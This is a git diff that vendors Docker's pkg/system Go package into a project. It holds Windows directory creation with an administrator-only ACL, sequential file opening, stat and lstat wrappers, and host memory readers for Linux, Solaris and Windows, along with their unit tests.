+	if re := regexp.MustCompile(`^\\\\\?\\Volume{[a-z0-9-]+}$`); re.MatchString(path) {
+		return nil
+	}
+
+	// The rest of this method is largely copied from os.MkdirAll and should be kept
+	// as-is to ensure compatibility.
+
+	// Fast path: if we can tell whether path is a directory or file, stop with success or error.
+	dir, err := os.Stat(path)
+	if err == nil {
+		if dir.IsDir() {
+			return nil
+		}
+		return &os.PathError{
+			Op:   "mkdir",
+			Path: path,
+			Err:  syscall.ENOTDIR,
+		}
+	}
+
+	// Slow path: make sure parent exists and then call Mkdir for path.
+	i := len(path)
+	for i > 0 && os.IsPathSeparator(path[i-1]) { // Skip trailing path separator.
+		i--
+	}
+
+	j := i
+	for j > 0 && !os.IsPathSeparator(path[j-1]) { // Scan backward over element.
+		j--
+	}
+
+	if j > 1 {
+		// Create parent
+		err = mkdirall(path[0:j-1], false)
+		if err != nil {
+			return err
+		}
+	}
+
+	// Parent now exists; invoke os.Mkdir or mkdirWithACL and use its result.
+	if adminAndLocalSystem {
+		err = mkdirWithACL(path)
+	} else {
+		err = os.Mkdir(path, 0)
+	}
+
+	if err != nil {
+		// Handle arguments like "foo/." by
+		// double-checking that directory doesn't exist.
+		dir, err1 := os.Lstat(path)
+		if err1 == nil && dir.IsDir() {
+			return nil
+		}
+		return err
+	}
+	return nil
+}
+
+// mkdirWithACL creates a new directory. If there is an error, it will be of
+// type *PathError. .
+//
+// This is a modified and combined version of os.Mkdir and syscall.Mkdir
+// in golang to cater for creating a directory am ACL permitting full
+// access, with inheritance, to any subfolder/file for Built-in Administrators
+// and Local System.
+func mkdirWithACL(name string) error {
+	sa := syscall.SecurityAttributes{Length: 0}
+	sddl := "D:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)"
+	sd, err := winio.SddlToSecurityDescriptor(sddl)
+	if err != nil {
+		return &os.PathError{Op: "mkdir", Path: name, Err: err}
+	}
+	sa.Length = uint32(unsafe.Sizeof(sa))
+	sa.InheritHandle = 1
+	sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0]))
+
+	namep, err := syscall.UTF16PtrFromString(name)
+	if err != nil {
+		return &os.PathError{Op: "mkdir", Path: name, Err: err}
+	}
+
+	e := syscall.CreateDirectory(namep, &sa)
+	if e != nil {
+		return &os.PathError{Op: "mkdir", Path: name, Err: e}
+	}
+	return nil
+}
+
+// IsAbs is a platform-specific wrapper for filepath.IsAbs. On Windows,
+// golang filepath.IsAbs does not consider a path \windows\system32 as absolute
+// as it doesn't start with a drive-letter/colon combination. However, in
+// docker we need to verify things such as WORKDIR /windows/system32 in
+// a Dockerfile (which gets translated to \windows\system32 when being processed
+// by the daemon. This SHOULD be treated as absolute from a docker processing
+// perspective.
+func IsAbs(path string) bool {
+	if !filepath.IsAbs(path) {
+		if !strings.HasPrefix(path, string(os.PathSeparator)) {
+			return false
+		}
+	}
+	return true
+}
+
+// The origin of the functions below here are the golang OS and syscall packages,
+// slightly modified to only cope with files, not directories due to the
+// specific use case.
+//
+// The alteration is to allow a file on Windows to be opened with
+// FILE_FLAG_SEQUENTIAL_SCAN (particular for docker load), to avoid eating
+// the standby list, particularly when accessing large files such as layer.tar.
+
+// CreateSequential creates the named file with mode 0666 (before umask), truncating
+// it if it already exists. If successful, methods on the returned
+// File can be used for I/O; the associated file descriptor has mode
+// O_RDWR.
+// If there is an error, it will be of type *PathError.
+func CreateSequential(name string) (*os.File, error) {
+	return OpenFileSequential(name, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0)
+}
+
+// OpenSequential opens the named file for reading. If successful, methods on
+// the returned file can be used for reading; the associated file
+// descriptor has mode O_RDONLY.
+// If there is an error, it will be of type *PathError.
+func OpenSequential(name string) (*os.File, error) {
+	return OpenFileSequential(name, os.O_RDONLY, 0)
+}
+
+// OpenFileSequential is the generalized open call; most users will use Open
+// or Create instead.
+// If there is an error, it will be of type *PathError.
+func OpenFileSequential(name string, flag int, _ os.FileMode) (*os.File, error) {
+	if name == "" {
+		return nil, &os.PathError{Op: "open", Path: name, Err: syscall.ENOENT}
+	}
+	r, errf := syscallOpenFileSequential(name, flag, 0)
+	if errf == nil {
+		return r, nil
+	}
+	return nil, &os.PathError{Op: "open", Path: name, Err: errf}
+}
+
+func syscallOpenFileSequential(name string, flag int, _ os.FileMode) (file *os.File, err error) {
+	r, e := syscallOpenSequential(name, flag|syscall.O_CLOEXEC, 0)
+	if e != nil {
+		return nil, e
+	}
+	return os.NewFile(uintptr(r), name), nil
+}
+
+func makeInheritSa() *syscall.SecurityAttributes {
+	var sa syscall.SecurityAttributes
+	sa.Length = uint32(unsafe.Sizeof(sa))
+	sa.InheritHandle = 1
+	return &sa
+}
+
+func syscallOpenSequential(path string, mode int, _ uint32) (fd syscall.Handle, err error) {
+	if len(path) == 0 {
+		return syscall.InvalidHandle, syscall.ERROR_FILE_NOT_FOUND
+	}
+	pathp, err := syscall.UTF16PtrFromString(path)
+	if err != nil {
+		return syscall.InvalidHandle, err
+	}
+	var access uint32
+	switch mode & (syscall.O_RDONLY | syscall.O_WRONLY | syscall.O_RDWR) {
+	case syscall.O_RDONLY:
+		access = syscall.GENERIC_READ
+	case syscall.O_WRONLY:
+		access = syscall.GENERIC_WRITE
+	case syscall.O_RDWR:
+		access = syscall.GENERIC_READ | syscall.GENERIC_WRITE
+	}
+	if mode&syscall.O_CREAT != 0 {
+		access |= syscall.GENERIC_WRITE
+	}
+	if mode&syscall.O_APPEND != 0 {
+		access &^= syscall.GENERIC_WRITE
+		access |= syscall.FILE_APPEND_DATA
+	}
+	sharemode := uint32(syscall.FILE_SHARE_READ | syscall.FILE_SHARE_WRITE)
+	var sa *syscall.SecurityAttributes
+	if mode&syscall.O_CLOEXEC == 0 {
+		sa = makeInheritSa()
+	}
+	var createmode uint32
+	switch {
+	case mode&(syscall.O_CREAT|syscall.O_EXCL) == (syscall.O_CREAT | syscall.O_EXCL):
+		createmode = syscall.CREATE_NEW
+	case mode&(syscall.O_CREAT|syscall.O_TRUNC) == (syscall.O_CREAT | syscall.O_TRUNC):
+		createmode = syscall.CREATE_ALWAYS
+	case mode&syscall.O_CREAT == syscall.O_CREAT:
+		createmode = syscall.OPEN_ALWAYS
+	case mode&syscall.O_TRUNC == syscall.O_TRUNC:
+		createmode = syscall.TRUNCATE_EXISTING
+	default:
+		createmode = syscall.OPEN_EXISTING
+	}
+	// Use FILE_FLAG_SEQUENTIAL_SCAN rather than FILE_ATTRIBUTE_NORMAL as implemented in golang.
+	//https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx
+	const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN
+	h, e := syscall.CreateFile(pathp, access, sharemode, sa, createmode, fileFlagSequentialScan, 0)
+	return h, e
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/lstat.go b/vendor/github.com/docker/docker/pkg/system/lstat.go
new file mode 100644
index 0000000000..bd23c4d50b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/lstat.go
@@ -0,0 +1,19 @@
+// +build !windows
+
+package system
+
+import (
+	"syscall"
+)
+
+// Lstat takes a path to a file and returns
+// a system.StatT type pertaining to that file.
+//
+// Throws an error if the file does not exist
+func Lstat(path string) (*StatT, error) {
+	s := &syscall.Stat_t{}
+	if err := syscall.Lstat(path, s); err != nil {
+		return nil, err
+	}
+	return fromStatT(s)
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go
new file mode 100644
index 0000000000..062cf53bfe
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go
@@ -0,0 +1,30 @@
+// +build linux freebsd
+
+package system
+
+import (
+	"os"
+	"testing"
+)
+
+// TestLstat tests Lstat for existing and non existing files
+func TestLstat(t *testing.T) {
+	file, invalid, _, dir := prepareFiles(t)
+	defer os.RemoveAll(dir)
+
+	statFile, err := Lstat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if statFile == nil {
+		t.Fatal("returned empty stat for existing file")
+	}
+
+	statInvalid, err := Lstat(invalid)
+	if err == nil {
+		t.Fatal("did not return error for non-existing file")
+	}
+	if statInvalid != nil {
+		t.Fatal("returned non-nil stat for non-existing file")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_windows.go b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go
new file mode 100644
index 0000000000..49e87eb40b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go
@@ -0,0 +1,25 @@
+// +build windows
+
+package system
+
+import (
+	"os"
+)
+
+// Lstat calls os.Lstat to get a fileinfo interface back.
+// This is then copied into our own locally defined structure.
+// Note the Linux version uses fromStatT to do the copy back,
+// but that not strictly necessary when already in an OS specific module.
+func Lstat(path string) (*StatT, error) {
+	fi, err := os.Lstat(path)
+	if err != nil {
+		return nil, err
+	}
+
+	return &StatT{
+		name:    fi.Name(),
+		size:    fi.Size(),
+		mode:    fi.Mode(),
+		modTime: fi.ModTime(),
+		isDir:   fi.IsDir()}, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo.go b/vendor/github.com/docker/docker/pkg/system/meminfo.go
new file mode 100644
index 0000000000..3b6e947e67
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo.go
@@ -0,0 +1,17 @@
+package system
+
+// MemInfo contains memory statistics of the host system.
+type MemInfo struct {
+	// Total usable RAM (i.e. physical RAM minus a few reserved bits and the
+	// kernel binary code).
+	MemTotal int64
+
+	// Amount of free memory.
+	MemFree int64
+
+	// Total amount of swap space available.
+	SwapTotal int64
+
+	// Amount of swap space that is currently unused.
+	SwapFree int64
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go
new file mode 100644
index 0000000000..385f1d5e73
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go
@@ -0,0 +1,65 @@
+package system
+
+import (
+	"bufio"
+	"io"
+	"os"
+	"strconv"
+	"strings"
+
+	"github.com/docker/go-units"
+)
+
+// ReadMemInfo retrieves memory statistics of the host system and returns a
+// MemInfo type.
+func ReadMemInfo() (*MemInfo, error) {
+	file, err := os.Open("/proc/meminfo")
+	if err != nil {
+		return nil, err
+	}
+	defer file.Close()
+	return parseMemInfo(file)
+}
+
+// parseMemInfo parses the /proc/meminfo file into
+// a MemInfo object given an io.Reader to the file.
+// Throws error if there are problems reading from the file
+func parseMemInfo(reader io.Reader) (*MemInfo, error) {
+	meminfo := &MemInfo{}
+	scanner := bufio.NewScanner(reader)
+	for scanner.Scan() {
+		// Expected format: ["MemTotal:", "1234", "kB"]
+		parts := strings.Fields(scanner.Text())
+
+		// Sanity checks: Skip malformed entries.
+		if len(parts) < 3 || parts[2] != "kB" {
+			continue
+		}
+
+		// Convert to bytes.
+		size, err := strconv.Atoi(parts[1])
+		if err != nil {
+			continue
+		}
+		bytes := int64(size) * units.KiB
+
+		switch parts[0] {
+		case "MemTotal:":
+			meminfo.MemTotal = bytes
+		case "MemFree:":
+			meminfo.MemFree = bytes
+		case "SwapTotal:":
+			meminfo.SwapTotal = bytes
+		case "SwapFree:":
+			meminfo.SwapFree = bytes
+		}
+
+	}
+
+	// Handle errors that may have occurred during the reading of the file.
+	if err := scanner.Err(); err != nil {
+		return nil, err
+	}
+
+	return meminfo, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go b/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go
new file mode 100644
index 0000000000..7f4f84f73a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go
@@ -0,0 +1,128 @@
+// +build solaris,cgo
+
+package system
+
+import (
+	"fmt"
+	"unsafe"
+)
+
+// #cgo LDFLAGS: -lkstat
+// #include <unistd.h>
+// #include <stdlib.h>
+// #include <stdio.h>
+// #include <kstat.h>
+// #include <sys/swap.h>
+// #include <sys/param.h>
+// struct swaptable *allocSwaptable(int num) {
+//	struct swaptable *st;
+//	struct swapent *swapent;
+// 	st = (struct swaptable *)malloc(num * sizeof(swapent_t) + sizeof (int));
+//	swapent = st->swt_ent;
+//	for (int i = 0; i < num; i++,swapent++) {
+//		swapent->ste_path = (char *)malloc(MAXPATHLEN * sizeof (char));
+//	}
+//	st->swt_n = num;
+//	return st;
+//}
+// void freeSwaptable (struct swaptable *st) {
+//	struct swapent *swapent = st->swt_ent;
+//	for (int i = 0; i < st->swt_n; i++,swapent++) {
+//		free(swapent->ste_path);
+//	}
+//	free(st);
+// }
+// swapent_t getSwapEnt(swapent_t *ent, int i) {
+//	return ent[i];
+// }
+// int64_t getPpKernel() {
+//	int64_t pp_kernel = 0;
+//	kstat_ctl_t *ksc;
+//	kstat_t *ks;
+//	kstat_named_t *knp;
+//	kid_t kid;
+//
+//	if ((ksc = kstat_open()) == NULL) {
+//		return -1;
+//	}
+//	if ((ks = kstat_lookup(ksc, "unix", 0, "system_pages")) == NULL) {
+//		return -1;
+//	}
+//	if (((kid = kstat_read(ksc, ks, NULL)) == -1) ||
+//	    ((knp = kstat_data_lookup(ks, "pp_kernel")) == NULL)) {
+//		return -1;
+//	}
+//	switch (knp->data_type) {
+//	case KSTAT_DATA_UINT64:
+//		pp_kernel = knp->value.ui64;
+//		break;
+//	case KSTAT_DATA_UINT32:
+//		pp_kernel = knp->value.ui32;
+//		break;
+//	}
+//	pp_kernel *= sysconf(_SC_PAGESIZE);
+//	return (pp_kernel > 0 ? pp_kernel : -1);
+// }
+import "C"
+
+// Get the system memory info using sysconf same as prtconf
+func getTotalMem() int64 {
+	pagesize := C.sysconf(C._SC_PAGESIZE)
+	npages := C.sysconf(C._SC_PHYS_PAGES)
+	return int64(pagesize * npages)
+}
+
+func getFreeMem() int64 {
+	pagesize := C.sysconf(C._SC_PAGESIZE)
+	npages := C.sysconf(C._SC_AVPHYS_PAGES)
+	return int64(pagesize * npages)
+}
+
+// ReadMemInfo retrieves memory statistics of the host system and returns a
+//  MemInfo type.
+func ReadMemInfo() (*MemInfo, error) {
+
+	ppKernel := C.getPpKernel()
+	MemTotal := getTotalMem()
+	MemFree := getFreeMem()
+	SwapTotal, SwapFree, err := getSysSwap()
+
+	if ppKernel < 0 || MemTotal < 0 || MemFree < 0 || SwapTotal < 0 ||
+		SwapFree < 0 {
+		return nil, fmt.Errorf("error getting system memory info %v\n", err)
+	}
+
+	meminfo := &MemInfo{}
+	// Total memory is total physical memory less than memory locked by kernel
+	meminfo.MemTotal = MemTotal - int64(ppKernel)
+	meminfo.MemFree = MemFree
+	meminfo.SwapTotal = SwapTotal
+	meminfo.SwapFree = SwapFree
+
+	return meminfo, nil
+}
+
+func getSysSwap() (int64, int64, error) {
+	var tSwap int64
+	var fSwap int64
+	var diskblksPerPage int64
+	num, err := C.swapctl(C.SC_GETNSWP, nil)
+	if err != nil {
+		return -1, -1, err
+	}
+	st := C.allocSwaptable(num)
+	_, err = C.swapctl(C.SC_LIST, unsafe.Pointer(st))
+	if err != nil {
+		C.freeSwaptable(st)
+		return -1, -1, err
+	}
+
+	diskblksPerPage = int64(C.sysconf(C._SC_PAGESIZE) >> C.DEV_BSHIFT)
+	for i := 0; i < int(num); i++ {
+		swapent := C.getSwapEnt(&st.swt_ent[0], C.int(i))
+		tSwap += int64(swapent.ste_pages) * diskblksPerPage
+		fSwap += int64(swapent.ste_free) * diskblksPerPage
+	}
+	C.freeSwaptable(st)
+	return tSwap, fSwap, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go
new file mode 100644
index 0000000000..44f5562882
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go
@@ -0,0 +1,40 @@
+// +build linux freebsd
+
+package system
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/docker/go-units"
+)
+
+// TestMemInfo tests parseMemInfo with a static meminfo string
+func TestMemInfo(t *testing.T) {
+	const input = `
+	MemTotal:      1 kB
+	MemFree:       2 kB
+	SwapTotal:     3 kB
+	SwapFree:      4 kB
+	Malformed1:
+	Malformed2:    1
+	Malformed3:    2 MB
+	Malformed4:    X kB
+	`
+	meminfo, err := parseMemInfo(strings.NewReader(input))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if meminfo.MemTotal != 1*units.KiB {
+		t.Fatalf("Unexpected MemTotal: %d", meminfo.MemTotal)
+	}
+	if meminfo.MemFree != 2*units.KiB {
+		t.Fatalf("Unexpected MemFree: %d", meminfo.MemFree)
+	}
+	if meminfo.SwapTotal != 3*units.KiB {
+		t.Fatalf("Unexpected SwapTotal: %d", meminfo.SwapTotal)
+	}
+	if meminfo.SwapFree != 4*units.KiB {
+		t.Fatalf("Unexpected SwapFree: %d", meminfo.SwapFree)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go
new file mode 100644
index 0000000000..3ce019dffd
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go
@@ -0,0 +1,8 @@
+// +build !linux,!windows,!solaris
+
+package system
+
+// ReadMemInfo is not supported on platforms other than linux and windows.
+func ReadMemInfo() (*MemInfo, error) {
+	return nil, ErrNotSupportedPlatform
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go
new file mode 100644
index 0000000000..883944a4c5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go
@@ -0,0 +1,45 @@
+package system
+
+import (
+	"unsafe"
+
+	"golang.org/x/sys/windows"
+)
+
+var (
+	modkernel32 = windows.NewLazySystemDLL("kernel32.dll")
+
+	procGlobalMemoryStatusEx = modkernel32.NewProc("GlobalMemoryStatusEx")
+)
+
+// https://msdn.microsoft.com/en-us/library/windows/desktop/aa366589(v=vs.85).aspx
+// https://msdn.microsoft.com/en-us/library/windows/desktop/aa366770(v=vs.85).aspx
+type memorystatusex struct {
+	dwLength                uint32
+	dwMemoryLoad            uint32
+	ullTotalPhys            uint64
+	ullAvailPhys            uint64
+	ullTotalPageFile        uint64
+	ullAvailPageFile        uint64
+	ullTotalVirtual         uint64
+	ullAvailVirtual         uint64
+	ullAvailExtendedVirtual uint64
+}
+
+// ReadMemInfo retrieves memory statistics of the host system and returns a
+//  MemInfo type.
+func ReadMemInfo() (*MemInfo, error) {
+	msi := &memorystatusex{
+		dwLength: 64,
+	}
+	r1, _, _ := procGlobalMemoryStatusEx.Call(uintptr(unsafe.Pointer(msi)))
+	if r1 == 0 {
+		return &MemInfo{}, nil
+	}
+	return &MemInfo{
+		MemTotal:  int64(msi.ullTotalPhys),
+		MemFree:   int64(msi.ullAvailPhys),
+		SwapTotal: int64(msi.ullTotalPageFile),
+		SwapFree:  int64(msi.ullAvailPageFile),
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/mknod.go b/vendor/github.com/docker/docker/pkg/system/mknod.go
new file mode 100644
index 0000000000..73958182b4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/mknod.go
@@ -0,0 +1,22 @@
+// +build !windows
+
+package system
+
+import (
+	"syscall"
+)
+
+// Mknod creates a filesystem node (file, device special file or named pipe) named path
+// with attributes specified by mode and dev.
+func Mknod(path string, mode uint32, dev int) error {
+	return syscall.Mknod(path, mode, dev)
+}
+
+// Mkdev is used to build the value of linux devices (in /dev/) which specifies major
+// and minor number of the newly created device special file.
+// Linux device nodes are a bit weird due to backwards compat with 16 bit device nodes.
+// They are, from low to high: the lower 8 bits of the minor, then 12 bits of the major,
+// then the top 12 bits of the minor.
+func Mkdev(major int64, minor int64) uint32 {
+	return uint32(((minor & 0xfff00) << 12) | ((major & 0xfff) << 8) | (minor & 0xff))
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/mknod_windows.go b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go
new file mode 100644
index 0000000000..2e863c0215
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go
@@ -0,0 +1,13 @@
+// +build windows
+
+package system
+
+// Mknod is not implemented on Windows.
+func Mknod(path string, mode uint32, dev int) error {
+	return ErrNotSupportedPlatform
+}
+
+// Mkdev is not implemented on Windows.
+func Mkdev(major int64, minor int64) uint32 {
+	panic("Mkdev not implemented on Windows.")
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/path_unix.go b/vendor/github.com/docker/docker/pkg/system/path_unix.go
new file mode 100644
index 0000000000..c607c4db09
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/path_unix.go
@@ -0,0 +1,14 @@
+// +build !windows
+
+package system
+
+// DefaultPathEnv is unix style list of directories to search for
+// executables. Each directory is separated from the next by a colon
+// ':' character .
+const DefaultPathEnv = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+
+// CheckSystemDriveAndRemoveDriveLetter verifies that a path, if it includes a drive letter,
+// is the system drive. This is a no-op on Linux.
+func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) {
+	return path, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows.go b/vendor/github.com/docker/docker/pkg/system/path_windows.go
new file mode 100644
index 0000000000..cbfe2c1576
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/path_windows.go
@@ -0,0 +1,37 @@
+// +build windows
+
+package system
+
+import (
+	"fmt"
+	"path/filepath"
+	"strings"
+)
+
+// DefaultPathEnv is deliberately empty on Windows as the default path will be set by
+// the container. Docker has no context of what the default path should be.
+const DefaultPathEnv = ""
+
+// CheckSystemDriveAndRemoveDriveLetter verifies and manipulates a Windows path.
+// This is used, for example, when validating a user provided path in docker cp.
+// If a drive letter is supplied, it must be the system drive. The drive letter
+// is always removed. Also, it translates it to OS semantics (IOW / to \). We
+// need the path in this syntax so that it can ultimately be contatenated with
+// a Windows long-path which doesn't support drive-letters. Examples:
+// C:			--> Fail
+// C:\			--> \
+// a			--> a
+// /a			--> \a
+// d:\			--> Fail
+func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) {
+	if len(path) == 2 && string(path[1]) == ":" {
+		return "", fmt.Errorf("No relative path specified in %q", path)
+	}
+	if !filepath.IsAbs(path) || len(path) < 2 {
+		return filepath.FromSlash(path), nil
+	}
+	if string(path[1]) == ":" && !strings.EqualFold(string(path[0]), "c") {
+		return "", fmt.Errorf("The specified path is not on the system drive (C:)")
+	}
+	return filepath.FromSlash(path[2:]), nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows_test.go b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go
new file mode 100644
index 0000000000..eccb26aaea
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go
@@ -0,0 +1,78 @@
+// +build windows
+
+package system
+
+import "testing"
+
+// TestCheckSystemDriveAndRemoveDriveLetter tests CheckSystemDriveAndRemoveDriveLetter
+func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) {
+	// Fails if not C drive.
+	path, err := CheckSystemDriveAndRemoveDriveLetter(`d:\`)
+	if err == nil || (err != nil && err.Error() != "The specified path is not on the system drive (C:)") {
+		t.Fatalf("Expected error for d:")
+	}
+
+	// Single character is unchanged
+	if path, err = CheckSystemDriveAndRemoveDriveLetter("z"); err != nil {
+		t.Fatalf("Single character should pass")
+	}
+	if path != "z" {
+		t.Fatalf("Single character should be unchanged")
+	}
+
+	// Two characters without colon is unchanged
+	if path, err = CheckSystemDriveAndRemoveDriveLetter("AB"); err != nil {
+		t.Fatalf("2 characters without colon should pass")
+	}
+	if path != "AB" {
+		t.Fatalf("2 characters without colon should be unchanged")
+	}
+
+	// Abs path without drive letter
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`\l`); err != nil {
+		t.Fatalf("abs path no drive letter should pass")
+	}
+	if path != `\l` {
+		t.Fatalf("abs path without drive letter should be unchanged")
+	}
+
+	// Abs path without drive letter, linux style
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`/l`); err != nil {
+		t.Fatalf("abs path no drive letter linux style should pass")
+	}
+	if path != `\l` {
+		t.Fatalf("abs path without drive letter linux failed %s", path)
+	}
+
+	// Drive-colon should be stripped
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:\`); err != nil {
+		t.Fatalf("An absolute path should pass")
+	}
+	if path != `\` {
+		t.Fatalf(`An absolute path should have been shortened to \ %s`, path)
+	}
+
+	// Verify with a linux-style path
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:/`); err != nil {
+		t.Fatalf("An absolute path should pass")
+	}
+	if path != `\` {
+		t.Fatalf(`A linux style absolute path should have been shortened to \ %s`, path)
+	}
+
+	// Failure on c:
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:`); err == nil {
+		t.Fatalf("c: should fail")
+	}
+	if err.Error() != `No relative path specified in "c:"` {
+		t.Fatalf(path, err)
+	}
+
+	// Failure on d:
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`d:`); err == nil {
+		t.Fatalf("c: should fail")
+	}
+	if err.Error() != `No relative path specified in "d:"` {
+		t.Fatalf(path, err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat.go b/vendor/github.com/docker/docker/pkg/system/stat.go
new file mode 100644
index 0000000000..087034c5ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/stat.go
@@ -0,0 +1,53 @@
+// +build !windows
+
+package system
+
+import (
+	"syscall"
+)
+
+// StatT type contains status of a file. It contains metadata
+// like permission, owner, group, size, etc about a file.
+type StatT struct {
+	mode uint32
+	uid  uint32
+	gid  uint32
+	rdev uint64
+	size int64
+	mtim syscall.Timespec
+}
+
+// Mode returns file's permission mode.
+func (s StatT) Mode() uint32 {
+	return s.mode
+}
+
+// UID returns file's user id of owner.
+func (s StatT) UID() uint32 {
+	return s.uid
+}
+
+// GID returns file's group id of owner.
+func (s StatT) GID() uint32 {
+	return s.gid
+}
+
+// Rdev returns file's device ID (if it's special file).
+func (s StatT) Rdev() uint64 {
+	return s.rdev
+}
+
+// Size returns file's size.
+func (s StatT) Size() int64 {
+	return s.size
+}
+
+// Mtim returns file's last modification time.
+func (s StatT) Mtim() syscall.Timespec {
+	return s.mtim
+}
+
+// GetLastModification returns file's last modification time.
+func (s StatT) GetLastModification() syscall.Timespec {
+	return s.Mtim()
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_darwin.go b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go
new file mode 100644
index 0000000000..f0742f59e5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go
@@ -0,0 +1,32 @@
+package system
+
+import (
+	"syscall"
+)
+
+// fromStatT creates a system.StatT type from a syscall.Stat_t type
+func fromStatT(s *syscall.Stat_t) (*StatT, error) {
+	return &StatT{size: s.Size,
+		mode: uint32(s.Mode),
+		uid:  s.Uid,
+		gid:  s.Gid,
+		rdev: uint64(s.Rdev),
+		mtim: s.Mtimespec}, nil
+}
+
+// FromStatT loads a system.StatT from a syscall.Stat_t.
+func FromStatT(s *syscall.Stat_t) (*StatT, error) {
+	return fromStatT(s)
+}
+
+// Stat takes a path to a file and returns
+// a system.StatT type pertaining to that file.
+//
+// Throws an error if the file does not exist
+func Stat(path string) (*StatT, error) {
+	s := &syscall.Stat_t{}
+	if err := syscall.Stat(path, s); err != nil {
+		return nil, err
+	}
+	return fromStatT(s)
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go
new file mode 100644
index 0000000000..d0fb6f1519
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go
@@ -0,0 +1,27 @@
+package system
+
+import (
+	"syscall"
+)
+
+// fromStatT converts a syscall.Stat_t type to a system.Stat_t type
+func fromStatT(s *syscall.Stat_t) (*StatT, error) {
+	return &StatT{size: s.Size,
+		mode: uint32(s.Mode),
+		uid:  s.Uid,
+		gid:  s.Gid,
+		rdev: uint64(s.Rdev),
+		mtim: s.Mtimespec}, nil
+}
+
+// Stat takes a path to a file and returns
+// a system.Stat_t type pertaining to that file.
+//
+// Throws an error if the file does not exist
+func Stat(path string) (*StatT, error) {
+	s := &syscall.Stat_t{}
+	if err := syscall.Stat(path, s); err != nil {
+		return nil, err
+	}
+	return fromStatT(s)
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_linux.go b/vendor/github.com/docker/docker/pkg/system/stat_linux.go
new file mode 100644
index 0000000000..8b1eded138
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/stat_linux.go
@@ -0,0 +1,33 @@
+package system
+
+import (
+	"syscall"
+)
+
+// fromStatT converts a syscall.Stat_t type to a system.Stat_t type
+func fromStatT(s *syscall.Stat_t) (*StatT, error) {
+	return &StatT{size: s.Size,
+		mode: s.Mode,
+		uid:  s.Uid,
+		gid:  s.Gid,
+		rdev: s.Rdev,
+		mtim: s.Mtim}, nil
+}
+
+// FromStatT exists only on linux, and loads a system.StatT from a
+// syscal.Stat_t.
+func FromStatT(s *syscall.Stat_t) (*StatT, error) {
+	return fromStatT(s)
+}
+
+// Stat takes a path to a file and returns
+// a system.StatT type pertaining to that file.
+//
+// Throws an error if the file does not exist
+func Stat(path string) (*StatT, error) {
+	s := &syscall.Stat_t{}
+	if err := syscall.Stat(path, s); err != nil {
+		return nil, err
+	}
+	return fromStatT(s)
+}
